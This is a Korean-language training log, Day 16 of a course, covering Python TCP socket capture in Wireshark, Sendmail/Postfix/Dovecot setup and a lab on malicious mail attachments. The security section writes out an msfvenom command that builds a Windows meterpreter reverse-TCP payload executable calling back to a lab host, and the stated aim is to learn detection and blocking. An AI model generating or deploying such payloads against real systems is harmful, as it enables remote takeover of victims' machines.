🔍 '' 검색 결과
👤 기본 접속 정보
서버 IP : 192.168.0.17
사용자 : 박종완
🐍 소켓 프로그래밍 기반 통신 분석
목표 : Python을 이용해 Client-Server 간의 Raw TCP 데이터를 생성하고 와이어샤크로 패킷 구조를 캡처
Server.py (수신단) - 4444 포트 대기
import socket server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind(("0.0.0.0", 4444)) server.listen(5)
Client.py (발신단) - 데이터 전송
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect(("172.16.0.1", 4444))
분석 포인트 : 와이어샤크 tcp.stream 필터링을 통해 소스 IP, 목적지 IP, 프로토콜 헤더 구조 확인
#Python #소켓프로그래밍 #TCP #Wireshark
📧 메일 서버(Postfix/Sendmail) 구축 및 설정
주요 설정 파일
/etc/mail/sendmail.cf : Addr=127.0.0.10.0.0.0으로 변경 (외부 통신 허용)
/etc/mail/access : makemap hash를 통한 릴레이 권한 설정
/etc/dovecot/dovecot.conf : 수신 서버 프로토콜 활성화
환경 구성 : 칼리(Kali)에 Evolution 또는 Thunderbird를 설치하여 실제 메일 송수신 및 SMTP 프로토콜 패킷 흐름 캡처
#Postfix #Sendmail #SMTP #Dovecot
⚠️ 보안 실습: 페이로드 생성
악성코드 시뮬레이션 : msfvenom을 사용하여 윈도우용 리버스 TCP 페이로드 생성
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=192.168.0.219 -f exe -o payload.exe
실습 목적 : 정상적인 파일(txt, jpg 등) 속에 숨겨진 악성 페이로드가 메일을 통해 유포되는 경로를 차단 및 탐지
#msfvenom #악성코드 #Meterpreter #보안탐지
📌 Day 16 요약 / 결론

📌 가상 환경(UTM, NAT) 설정의 중요성을 확인. 내부 네트워크(Inside)와 DMZ 구간의 방화벽 정책이 올바르게 설정되어야 소켓 통신 및 메일 송수신이 원활함을 파악

📌 메일 서버 설정 시 sendmail.cf의 바인딩 주소 에러로 인한 통신 불가 현상을 해결

📌 메일 프로토콜(SMTP)이 어떻게 악성 파일의 매개체가 될 수 있는지 실습을 통해 체감

🎯 결론 : "소켓 통신 분석 및 메일 서버 보안 실습 완료"
#Linux #Python #SMTP #Postfix #보안 #msfvenom
16/31